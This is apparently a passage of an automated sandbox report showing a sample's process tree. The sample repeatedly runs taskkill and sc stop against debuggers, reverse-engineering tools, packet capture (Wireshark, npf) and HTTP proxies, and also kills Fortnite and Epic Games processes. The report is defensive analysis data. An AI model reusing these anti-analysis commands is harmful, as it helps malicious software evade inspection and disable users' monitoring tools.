  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:428
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:988
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:3260
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4904
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:492
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:1464
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1500
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:752
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2328
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4144
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3728
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:452
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2564
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4392
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4552
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4428
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4184
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:1428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:3120
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4204
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq die*" /IM * /F /T
      4⤵
      PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:1568
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:3852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:1344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3812
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1104
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:880
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3204
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:772
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:5080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1380
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3328
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2864
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4260
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1724
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2704
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4744
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3620
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:728
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3984
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4464
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:5092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4688
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1704
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:680
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3300
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1292
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4828
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4480
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:3312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:4904
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:4368
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:980
